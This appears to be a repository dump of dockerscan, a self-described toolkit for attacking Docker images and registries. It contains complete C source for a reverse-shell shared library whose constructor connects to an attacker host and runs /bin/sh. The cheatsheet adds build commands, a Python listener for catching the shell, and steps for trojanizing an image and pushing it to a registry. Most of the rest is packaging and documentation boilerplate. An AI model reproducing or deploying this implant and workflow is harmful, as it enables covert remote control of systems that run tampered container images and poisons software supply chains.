├── .github
│   └── FUNDING.yml
├── .gitignore
├── .idea
│   ├── .name
│   ├── DockerScan.iml
│   ├── encodings.xml
│   ├── inspectionProfiles
│   │   └── profiles_settings.xml
│   ├── misc.xml
│   ├── modules.xml
│   └── vcs.xml
├── CHANGELOG
├── LICENSE
├── MANIFEST.in
├── README.rst
├── codecov.yml
├── doc
│   ├── Makefile
│   ├── preparation
│   │   ├── IDEAS.rst
│   │   ├── cheatsheet.txt
│   │   ├── links.rst
│   │   ├── reverse_shell.so
│   │   └── reverse_shell_library.c
│   └── source
│       ├── _static
│       │   ├── dockerscan-logo.png
│       │   └── favicon.ico
│       ├── conf.py
│       ├── favicon.ico
│       ├── index.rst
│       └── quickstart.rst
├── dockerscan
│   ├── __init__.py
│   ├── __main__.py
│   ├── actions
│   │   ├── __init__.py
│   │   ├── cli.py
│   │   ├── helpers.py
│   │   ├── image
│   │   │   ├── __init__.py
│   │   │   ├── api.py
│   │   │   ├── cli.py
│   │   │   ├── console.py
│   │   │   ├── docker_api.py
│   │   │   ├── image_analyzer.py
│   │   │   ├── model.py
│   │   │   └── modifiers
│   │   │       ├── __init__.py
│   │   │       ├── api.py
│   │   │       ├── cli.py
│   │   │       ├── console.py
│   │   │       ├── model.py
│   │   │       └── shells
│   │   │           └── reverse_shell.so
│   │   ├── registry
│   │   │   ├── __init__.py
│   │   │   ├── api.py
│   │   │   ├── cli.py
│   │   │   ├── console.py
│   │   │   ├── libs
│   │   │   │   ├── __init__.py
│   │   │   │   ├── helpers.py
│   │   │   │   └── registry_v2.py
│   │   │   └── model.py
│   │   └── scan
│   │       ├── __init__.py
│   │       ├── api.py
│   │       ├── cli.py
│   │       ├── console.py
│   │       └── model.py
│   └── core
│       ├── __init__.py
│       ├── exceptions.py
│       ├── helpers.py
│       ├── logger.py
│       ├── model.py
│       └── shared_cmd_options.py
├── pytest.ini
├── requirements-dev.txt
├── requirements-performance.txt
├── requirements-runtest.txt
├── requirements.txt
├── setup.py
├── test
│   ├── __init__.py
│   └── unittesting
│       ├── __init__.py
│       ├── actions
│       │   ├── __init__.py
│       │   └── default
│       │       ├── __init__.py
│       │       ├── api
│       │       │   ├── __init__.py
│       │       │   └── test_run_dockerscan.py
│       │       └── cli
│       │           ├── __init__.py
│       │           ├── test_cli.py
│       │           └── test_cli_info.py
│       ├── core
│       │   ├── __init__.py
│       │   ├── helpers
│       │   │   ├── __init__.py
│       │   │   └── test_dict_to_obj.py
│       │   ├── logger
│       │   │   ├── __init__.py
│       │   │   └── test_setup_logging.py
│       │   └── shared_cmd_options
│       │       ├── __init__.py
│       │       └── test_global_options.py
│       └── mains
│           ├── __init__.py
│           └── test_apitest_comparer_main.py
└── tox.ini
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: [cr0hn]
4 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | #*.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | env/
12 | build/
13 | develop-eggs/
14 | dist/
15 | downloads/
16 | eggs/
17 | .eggs/
18 | lib/
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | *.egg-info/
24 | .installed.cfg
25 | *.egg
26 |
27 | # PyInstaller
28 | # Usually these files are written by a python script from a template
29 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
30 | *.manifest
31 | *.spec
32 |
33 | # Installer logs
34 | pip-log.txt
35 | pip-delete-this-directory.txt
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .coverage
41 | .coverage.*
42 | .cache
43 | nosetests.xml
44 | coverage.xml
45 | *,cover
46 | .hypothesis/
47 |
48 | # Translations
49 | *.mo
50 | *.pot
51 |
52 | # Django stuff:
53 | *.log
54 | local_settings.py
55 |
56 | # Flask stuff:
57 | instance/
58 | .webassets-cache
59 |
60 | # Scrapy stuff:
61 | .scrapy
62 |
63 | # Sphinx documentation
64 | docs/_build/
65 |
66 | # PyBuilder
67 | target/
68 |
69 | # IPython Notebook
70 | .ipynb_checkpoints
71 |
72 | # pyenv
73 | .python-version
74 |
75 | # celery beat schedule file
76 | celerybeat-schedule
77 |
78 | # dotenv
79 | .env
80 |
81 | # virtualenv
82 | venv/
83 | ENV/
84 |
85 | # Spyder project settings
86 | .spyderproject
87 |
88 | # Rope project settings
89 | .ropeproject
90 | docker_images/
91 | /dockerscan/nginx-trojanized/
92 | /dockerscan/debian-base/
93 |
--------------------------------------------------------------------------------
/.idea/.name:
--------------------------------------------------------------------------------
1 | DockerScan
--------------------------------------------------------------------------------
/.idea/DockerScan.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CHANGELOG:
--------------------------------------------------------------------------------
1 | Version 1.0.0-alpha1
2 | ====================
3 |
4 | First release
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Copyright (c) Daniel Garcia (cr0hn) / Roberto Munoz
2 |
3 | Project home: https://github.com/cr0hn/dockerscan
4 | Project contact: author[at]mail.com
5 |
6 | Redistribution and use in source and binary forms, with or without modification,
7 | are permitted provided that the following conditions are met:
8 |
9 | 1. Redistributions of source code must retain the above copyright notice,
10 | this list of conditions and the following disclaimer.
11 |
12 | 2. Redistributions in binary form must reproduce the above copyright
13 | notice, this list of conditions and the following disclaimer in the
14 | documentation and/or other materials provided with the distribution.
15 |
16 | 3. Neither the name of Daniel Garcia (cr0hn) / Roberto Munoz nor the names of its contributors may be used
17 | to endorse or promote products derived from this software without
18 | specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
21 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
22 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
24 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
25 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
26 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
27 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
28 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
29 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------
/MANIFEST.in:
--------------------------------------------------------------------------------
1 | include LICENSE CHANGELOG README.rst requirements.txt requirements-performance.txt dockerscan/actions/image/modifiers/shells/reverse_shell.so
2 |
3 | recursive-exclude * __pycache__
4 | recursive-exclude * *.pyc
5 | recursive-exclude * *.pyo
6 | recursive-exclude * *.orig
7 | recursive-exclude * .DS_Store
8 | global-exclude __pycache__/*
9 | global-exclude .deps/*
10 | global-exclude *.pyd
11 | global-exclude *.pyc
12 | global-exclude .git*
13 | global-exclude .DS_Store
14 | global-exclude .mailmap
15 |
16 | prune dockerscan/doc*
17 | graft dockerscan/resources/*
18 |
19 |
--------------------------------------------------------------------------------
/README.rst:
--------------------------------------------------------------------------------
1 | dockerscan
2 | ==========
3 |
4 | *dockerscan: a Docker analysis & hacking toolkit*
5 |
6 | .. image:: https://github.com/cr0hn/dockerscan/raw/master/doc/source/_static/dockerscan-logo.png
7 | :height: 64px
8 | :width: 64px
9 | :alt: DockerScan logo
10 |
11 | +----------------+--------------------------------------------------+
12 | |Project site | http://github.com/cr0hn/dockerscan |
13 | +----------------+--------------------------------------------------+
14 | |Issues | https://github.com/cr0hn/dockerscan/issues/ |
15 | +----------------+--------------------------------------------------+
16 | |Author | Daniel Garcia (cr0hn) / Roberto Munoz (robskye) |
17 | +----------------+--------------------------------------------------+
18 | |Documentation | http://dockerscan.readthedocs.org |
19 | +----------------+--------------------------------------------------+
20 | |Last Version | 1.0.0-Alpha-02 |
21 | +----------------+--------------------------------------------------+
22 | |Python versions | 3.5 or above |
23 | +----------------+--------------------------------------------------+
24 |
25 | Support this project
26 | ====================
27 |
28 | Support this project (to solve issues, add new features...) by using the GitHub "Sponsor" button.
29 |
30 | What's dockerscan
31 | =================
32 |
33 | A toolkit for analyzing and attacking Docker images and registries.
34 |
35 | Very quick install
36 | ==================
37 |
38 | .. code-block:: bash
39 |
40 | > python3.5 -m pip install -U pip
41 | > python3.5 -m pip install dockerscan
42 |
43 | Show options:
44 |
45 | .. code-block:: bash
46 |
47 | > dockerscan -h
48 |
49 | Available actions
50 | =================
51 |
52 | Currently dockerscan supports these actions (a small Python usage sketch follows the list):
53 |
54 | - Scan: Scan a network trying to locate Docker Registries
55 |
56 | - Registry
57 |
58 | - Delete: Delete remote image / tag
59 | - Info: Show info from remote registry
60 | - Push: Push an image (like Docker client)
61 | - Upload: Upload a random file
62 |
63 | - Image
64 |
65 | - Analyze: Look for sensitive information in a Docker image.
66 |
67 | - Look for passwords in environment variables.
68 | - Try to find URLs / IPs in the environment variables.
69 | - Try to deduce the user used internally to run the software. This is not trivial: if the entry point is a .sh file, the file is read looking for sudo-like calls (“sudo”, “gosu”, “sh -u”…) and the user found is reported.
70 |
71 | - Extract: extract a docker image
72 | - Info: Get image meta-information
73 | - Modify:
74 |
75 | - entrypoint: change the entrypoint in a docker image
76 | - **trojanize**: inject a reverse shell into a docker image
77 | - user: change running user in a docker image
78 |
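These console actions are thin wrappers over a small Python API (see ``dockerscan/actions/image/api.py``). The following is a minimal, illustrative sketch only: it assumes ``DockerImageInfoModel`` can be built from just an ``image_path`` (the CLI also feeds its global options into the model):

.. code-block:: python

    # Illustrative sketch: model fields other than "image_path" are an assumption
    from dockerscan.actions.image.model import DockerImageInfoModel
    from dockerscan.actions.image.api import run_image_info_dockerscan

    config = DockerImageInfoModel(image_path="nginx-latest.tar")

    # Returns a DockerImageInfo object with the aggregated layer metadata
    info = run_image_info_dockerscan(config)
    print(info.__dict__)
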
79 | What's the difference from Clair or Docker Cloud?
80 | =================================================
81 |
82 | The purpose of dockerscan is different: it is focused on the attack phase.
83 |
84 | Although dockerscan has some functionality to detect vulnerabilities in Docker images and Docker registries, its main objective is the attack.
85 |
86 | Documentation
87 | =============
88 |
89 | Documentation is still in progress... sorry!
90 |
91 | For the moment we only have the slides from RootedCON Spain, the conference where dockerscan was presented:
92 |
93 | https://www.slideshare.net/cr0hn/rootedcon-2017-docker-might-not-be-your-friend-trojanizing-docker-images/1
94 |
95 | Or you can watch it in video format (recommended):
96 |
97 | https://youtu.be/OwX1e4y4JMk
98 |
99 | Also, you can watch a dockerscan usage demo:
100 |
101 | https://youtu.be/UvtBGIb3E3o
102 |
103 | Contributing
104 | ============
105 |
106 | Any collaboration is welcome!
107 |
108 | There are many tasks to do. You can check the `Issues <https://github.com/cr0hn/dockerscan/issues/>`_ and send us a Pull Request.
109 |
110 | License
111 | =======
112 |
113 | This project is distributed under a BSD 3-Clause license (see the ``LICENSE`` file in the repository).
114 |
115 |
--------------------------------------------------------------------------------
/codecov.yml:
--------------------------------------------------------------------------------
1 | codecov:
2 | branch: master
3 |
4 | coverage:
5 | range: "85...100"
--------------------------------------------------------------------------------
/doc/Makefile:
--------------------------------------------------------------------------------
1 | # Makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line.
5 | SPHINXOPTS =
6 | SPHINXBUILD = sphinx-build
7 | PAPER =
8 | BUILDDIR = build
9 |
10 | # User-friendly check for sphinx-build
11 | ifeq ($(shell which $(SPHINXBUILD) >/dev/null 2>&1; echo $$?), 1)
12 | $(error The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed, then set the SPHINXBUILD environment variable to point to the full path of the '$(SPHINXBUILD)' executable. Alternatively you can add the directory with the executable to your PATH. If you don't have Sphinx installed, grab it from http://sphinx-doc.org/)
13 | endif
14 |
15 | # Internal variables.
16 | PAPEROPT_a4 = -D latex_paper_size=a4
17 | PAPEROPT_letter = -D latex_paper_size=letter
18 | ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
19 | # the i18n builder cannot share the environment and doctrees with the others
20 | I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
21 |
22 | .PHONY: help
23 | help:
24 | @echo "Please use \`make ' where is one of"
25 | @echo " html to make standalone HTML files"
26 | @echo " dirhtml to make HTML files named index.html in directories"
27 | @echo " singlehtml to make a single large HTML file"
28 | @echo " pickle to make pickle files"
29 | @echo " json to make JSON files"
30 | @echo " htmlhelp to make HTML files and a HTML help project"
31 | @echo " qthelp to make HTML files and a qthelp project"
32 | @echo " applehelp to make an Apple Help Book"
33 | @echo " devhelp to make HTML files and a Devhelp project"
34 | @echo " epub to make an epub"
35 | @echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
36 | @echo " latexpdf to make LaTeX files and run them through pdflatex"
37 | @echo " latexpdfja to make LaTeX files and run them through platex/dvipdfmx"
38 | @echo " text to make text files"
39 | @echo " man to make manual pages"
40 | @echo " texinfo to make Texinfo files"
41 | @echo " info to make Texinfo files and run them through makeinfo"
42 | @echo " gettext to make PO message catalogs"
43 | @echo " changes to make an overview of all changed/added/deprecated items"
44 | @echo " xml to make Docutils-native XML files"
45 | @echo " pseudoxml to make pseudoxml-XML files for display purposes"
46 | @echo " linkcheck to check all external links for integrity"
47 | @echo " doctest to run all doctests embedded in the documentation (if enabled)"
48 | @echo " coverage to run coverage check of the documentation (if enabled)"
49 |
50 | .PHONY: clean
51 | clean:
52 | rm -rf $(BUILDDIR)/*
53 |
54 | .PHONY: html
55 | html:
56 | $(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html
57 | @echo
58 | @echo "Build finished. The HTML pages are in $(BUILDDIR)/html."
59 |
60 | .PHONY: dirhtml
61 | dirhtml:
62 | $(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml
63 | @echo
64 | @echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml."
65 |
66 | .PHONY: singlehtml
67 | singlehtml:
68 | $(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml
69 | @echo
70 | @echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml."
71 |
72 | .PHONY: pickle
73 | pickle:
74 | $(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle
75 | @echo
76 | @echo "Build finished; now you can process the pickle files."
77 |
78 | .PHONY: json
79 | json:
80 | $(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json
81 | @echo
82 | @echo "Build finished; now you can process the JSON files."
83 |
84 | .PHONY: htmlhelp
85 | htmlhelp:
86 | $(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp
87 | @echo
88 | @echo "Build finished; now you can run HTML Help Workshop with the" \
89 | ".hhp project file in $(BUILDDIR)/htmlhelp."
90 |
91 | .PHONY: qthelp
92 | qthelp:
93 | $(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp
94 | @echo
95 | @echo "Build finished; now you can run "qcollectiongenerator" with the" \
96 | ".qhcp project file in $(BUILDDIR)/qthelp, like this:"
97 | @echo "# qcollectiongenerator $(BUILDDIR)/qthelp/API-Test.qhcp"
98 | @echo "To view the help file:"
99 | @echo "# assistant -collectionFile $(BUILDDIR)/qthelp/API-Test.qhc"
100 |
101 | .PHONY: applehelp
102 | applehelp:
103 | $(SPHINXBUILD) -b applehelp $(ALLSPHINXOPTS) $(BUILDDIR)/applehelp
104 | @echo
105 | @echo "Build finished. The help book is in $(BUILDDIR)/applehelp."
106 | @echo "N.B. You won't be able to view it unless you put it in" \
107 | "~/Library/Documentation/Help or install it in your application" \
108 | "bundle."
109 |
110 | .PHONY: devhelp
111 | devhelp:
112 | $(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp
113 | @echo
114 | @echo "Build finished."
115 | @echo "To view the help file:"
116 | @echo "# mkdir -p $$HOME/.local/share/devhelp/API-Test"
117 | @echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/API-Test"
118 | @echo "# devhelp"
119 |
120 | .PHONY: epub
121 | epub:
122 | $(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub
123 | @echo
124 | @echo "Build finished. The epub file is in $(BUILDDIR)/epub."
125 |
126 | .PHONY: latex
127 | latex:
128 | $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
129 | @echo
130 | @echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex."
131 | @echo "Run \`make' in that directory to run these through (pdf)latex" \
132 | "(use \`make latexpdf' here to do that automatically)."
133 |
134 | .PHONY: latexpdf
135 | latexpdf:
136 | $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
137 | @echo "Running LaTeX files through pdflatex..."
138 | $(MAKE) -C $(BUILDDIR)/latex all-pdf
139 | @echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
140 |
141 | .PHONY: latexpdfja
142 | latexpdfja:
143 | $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
144 | @echo "Running LaTeX files through platex and dvipdfmx..."
145 | $(MAKE) -C $(BUILDDIR)/latex all-pdf-ja
146 | @echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
147 |
148 | .PHONY: text
149 | text:
150 | $(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text
151 | @echo
152 | @echo "Build finished. The text files are in $(BUILDDIR)/text."
153 |
154 | .PHONY: man
155 | man:
156 | $(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man
157 | @echo
158 | @echo "Build finished. The manual pages are in $(BUILDDIR)/man."
159 |
160 | .PHONY: texinfo
161 | texinfo:
162 | $(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
163 | @echo
164 | @echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo."
165 | @echo "Run \`make' in that directory to run these through makeinfo" \
166 | "(use \`make info' here to do that automatically)."
167 |
168 | .PHONY: info
169 | info:
170 | $(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
171 | @echo "Running Texinfo files through makeinfo..."
172 | make -C $(BUILDDIR)/texinfo info
173 | @echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo."
174 |
175 | .PHONY: gettext
176 | gettext:
177 | $(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale
178 | @echo
179 | @echo "Build finished. The message catalogs are in $(BUILDDIR)/locale."
180 |
181 | .PHONY: changes
182 | changes:
183 | $(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes
184 | @echo
185 | @echo "The overview file is in $(BUILDDIR)/changes."
186 |
187 | .PHONY: linkcheck
188 | linkcheck:
189 | $(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck
190 | @echo
191 | @echo "Link check complete; look for any errors in the above output " \
192 | "or in $(BUILDDIR)/linkcheck/output.txt."
193 |
194 | .PHONY: doctest
195 | doctest:
196 | $(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest
197 | @echo "Testing of doctests in the sources finished, look at the " \
198 | "results in $(BUILDDIR)/doctest/output.txt."
199 |
200 | .PHONY: coverage
201 | coverage:
202 | $(SPHINXBUILD) -b coverage $(ALLSPHINXOPTS) $(BUILDDIR)/coverage
203 | @echo "Testing of coverage in the sources finished, look at the " \
204 | "results in $(BUILDDIR)/coverage/python.txt."
205 |
206 | .PHONY: xml
207 | xml:
208 | $(SPHINXBUILD) -b xml $(ALLSPHINXOPTS) $(BUILDDIR)/xml
209 | @echo
210 | @echo "Build finished. The XML files are in $(BUILDDIR)/xml."
211 |
212 | .PHONY: pseudoxml
213 | pseudoxml:
214 | $(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml
215 | @echo
216 | @echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml."
217 |
--------------------------------------------------------------------------------
/doc/preparation/IDEAS.rst:
--------------------------------------------------------------------------------
1 | Ideas for the talk
2 | ==================
3 |
4 |
5 | Slides
6 | ------
7 |
8 | [ ] Define structure
9 | [ ] Define index
10 |
11 |
12 | Tool
13 | ----
14 |
15 | [ ] Define the actions that the tool will do
16 |
--------------------------------------------------------------------------------
/doc/preparation/cheatsheet.txt:
--------------------------------------------------------------------------------
1 | Push a container:
2 |
3 | docker tag busybox 127.0.0.1:5000/cr0hn/busybox
4 | docker tag postgres:9.6.1-alpine 127.0.0.1:5000/cr0hn/postgres
5 |
6 | docker push 127.0.0.1:5000/cr0hn/busybox
7 | docker push 127.0.0.1:5000/cr0hn/postgres
8 |
9 |
10 | Cool stuff:
11 |
12 | -= Deleting images =-
13 |
14 | You cannot delete images or manifests from a registry unless you enable it explicitly. By default it is not possible, since the registry is configured as a "pull-through cache":
15 |
16 | docker run -d -p 5000:5000 --restart=always --name registry \
17 | -v `pwd`/config.yml:/etc/docker/registry/config.yml \
18 | registry:2
19 |
20 | > config.yml:
21 |
22 | delete:
23 | enabled: false
24 |
25 | In other words:
26 |
27 | If someone uploads malware, it will stay there until the end of time.
28 |
29 | References:
30 | - Configuration file: https://docs.docker.com/registry/configuration/
31 | - Pull through cache: https://docs.docker.com/registry/recipes/mirror/
32 |
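A quick way to check whether a registry allows deletions, as an illustrative Python sketch (the host, repository and tag below are just examples):

    # Resolve the manifest digest of a tag, then try to DELETE it.
    # 202 = deletion enabled, 405 = deletion disabled (the default).
    import requests

    registry = "http://127.0.0.1:5000"
    repo, tag = "cr0hn/busybox", "latest"

    r = requests.get(
        "{}/v2/{}/manifests/{}".format(registry, repo, tag),
        headers={"Accept": "application/vnd.docker.distribution.manifest.v2+json"})
    digest = r.headers["Docker-Content-Digest"]

    r = requests.delete("{}/v2/{}/manifests/{}".format(registry, repo, digest))
    print(r.status_code)
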
33 | -= Uploading files =-
34 |
35 | If you upload a file to a registry it gets stored, but it cannot be accessed unless you have its digest. And with the default Registry configuration it cannot be deleted either.
36 |
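An illustrative Python sketch of that kind of upload (host, repository and file name are just examples); the blob can only be fetched back later by its exact sha256 digest:

    import hashlib
    import requests

    registry = "http://127.0.0.1:5000"
    repo = "cr0hn/busybox"

    data = open("random_file.bin", "rb").read()
    digest = "sha256:" + hashlib.sha256(data).hexdigest()

    # 1. Start an upload session: the registry answers 202 with a Location header
    r = requests.post("{}/v2/{}/blobs/uploads/".format(registry, repo))
    upload_url = r.headers["Location"]

    # 2. Finish with a single monolithic PUT, passing the digest as a query parameter
    r = requests.put(upload_url,
                     params={"digest": digest},
                     headers={"Content-Type": "application/octet-stream"},
                     data=data)
    print(r.status_code)   # 201 if the blob was stored
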
37 | -= Compiling the dynamic library =-
38 |
39 | gcc -c -fpic reverse_shell_library.c
40 | gcc -shared -o reverse_shell.so reverse_shell_library.o
41 |
42 |
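To catch the shell spawned by reverse_shell.so (it reads REMOTE_ADDR / REMOTE_PORT from the environment and connects back), any TCP listener works. A minimal Python sketch, equivalent to "nc -l -p 2222":

    import socket

    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", 2222))
    srv.listen(1)

    conn, addr = srv.accept()
    print("Connection from", addr)
    print(conn.recv(1024).decode(errors="replace"))  # "connecting people" banner

    conn.sendall(b"id\n")                            # run a command in the remote /bin/sh
    print(conn.recv(4096).decode(errors="replace"))
    conn.close()
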
43 | -= Changing the entry-point, example =-
44 |
45 | 1 - Show the info of the image "rawmind/alpine-traefik:1.1.2-1"
46 |
47 | python __main__.py -vvvvvv image info docker_images/alpine-traefik\:1.1.2-1
48 |
49 | 2 - Change the entry-point
50 |
51 | python __main__.py -vvvvvv image modify entrypoint docker_images/alpine-traefik:1.1.2-1 /bin/bash
52 |
53 | 3 - Show the info of the new container:
54 |
55 | python __main__.py -vvvvvv image info alpine-traefik\:1.1.2-1.tar
56 |
57 | 4 - Load the container into docker:
58 |
59 | docker load -i alpine-traefik\:1.1.2-1.tar
60 |
61 | 5 - Run the container
62 |
63 | docker run --rm rawmind/alpine-traefik:1.1.2-1
64 |
65 | And in interactive mode (remember that the entry-point has been changed to bash, which means bash will run and then exit):
66 |
67 | docker run --rm -it rawmind/alpine-traefik:1.1.2-1
68 |
69 |
70 | -= Creating the docker images =-
71 |
72 | Create the debian base image:
73 |
74 | docker build -t localhost:5000/debian-base:latest .
75 | docker push localhost:5000/debian-base:latest
76 | docker save localhost:5000/debian-base:latest -o debian-base:latest
77 |
78 | Trojanize the image:
79 |
80 | python __main__.py image modify trojanize debian-base/debian-base\:latest -l 192.168.43.196
81 |
82 | Load the trojanized image:
83 |
84 | docker load -i debian-base\:latest
85 |
86 | Push the image:
87 |
88 | docker push localhost:5000/debian-base:latest
89 |
90 | Build the trojanized nginx:
91 |
92 | docker build -t nginx-trojanized .
93 |
--------------------------------------------------------------------------------
/doc/preparation/links.rst:
--------------------------------------------------------------------------------
1 | Useful links
2 | ============
3 |
4 | MindMap
5 | -------
6 |
7 | - https://drive.mindmup.com/map/0B1Z-wk-sBrI1Sk5LNHctcFBzemM
8 |
9 | Extract Docker images / info
10 | ----------------------------
11 |
12 | - https://github.com/larsks/undocker
13 | - https://github.com/davedoesdev/dtuf
14 | - https://github.com/davedoesdev/dxf
15 |
16 | Modify ELFs
17 | -----------
18 | - https://github.com/thorkill/eresi/wiki/TheELFsh
19 | - https://github.com/tiago4orion/libmalelf
20 |
--------------------------------------------------------------------------------
/doc/preparation/reverse_shell.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/doc/preparation/reverse_shell.so
--------------------------------------------------------------------------------
/doc/preparation/reverse_shell_library.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <stdlib.h>
3 | #include <stdint.h>
4 | #include <unistd.h>
5 | #include <sys/socket.h>
6 | #include <netinet/in.h>
7 | #include <arpa/inet.h>
8 |
9 | //#define raddr "127.0.0.1"
10 | //#define rport 2222
11 |
12 | static int con() __attribute__((constructor));
13 |
14 |
15 | int con()
16 | {
17 | int pid = fork();
18 | if(pid == 0)
19 | {
20 | const char *raddr = (const char *)getenv("REMOTE_ADDR");
21 | uint16_t rport = (uint16_t )atoi(getenv("REMOTE_PORT"));
22 | char buffy[] = "connecting people\n\r";
23 | struct sockaddr_in sa;
24 | int s;
25 | sa.sin_family = AF_INET;
26 | sa.sin_addr.s_addr = inet_addr(raddr);
27 | sa.sin_port = htons(rport);
28 |
29 | s = socket(AF_INET, SOCK_STREAM, 0);
30 | connect(s, (struct sockaddr *)&sa, sizeof(sa));
31 | write(s,buffy,sizeof(buffy));
32 | dup2(s, 0);
33 | dup2(s, 1);
34 | dup2(s, 2);
35 |
36 | execve("/bin/sh", 0, 0);
37 | return 0;
38 | }
39 | else
40 | {
41 | return 0;
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/doc/source/_static/dockerscan-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/doc/source/_static/dockerscan-logo.png
--------------------------------------------------------------------------------
/doc/source/_static/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/doc/source/_static/favicon.ico
--------------------------------------------------------------------------------
/doc/source/conf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | #
3 | # API-Test documentation build configuration file, created by
4 | # sphinx-quickstart on Mon Oct 10 23:43:03 2016.
5 | #
6 | # This file is execfile()d with the current directory set to its
7 | # containing dir.
8 | #
9 | # Note that not all possible configuration values are present in this
10 | # autogenerated file.
11 | #
12 | # All configuration values have a default; values that are commented out
13 | # serve to show the default.
14 |
15 | import os
16 | import sys
17 |
18 | # If extensions (or modules to document with autodoc) are in another directory,
19 | # add these directories to sys.path here. If the directory is relative to the
20 | # documentation root, use os.path.abspath to make it absolute, like shown here.
21 | sys.path.insert(0, os.path.abspath(os.path.join('..', "..")))
22 |
23 | # -- General configuration ------------------------------------------------
24 |
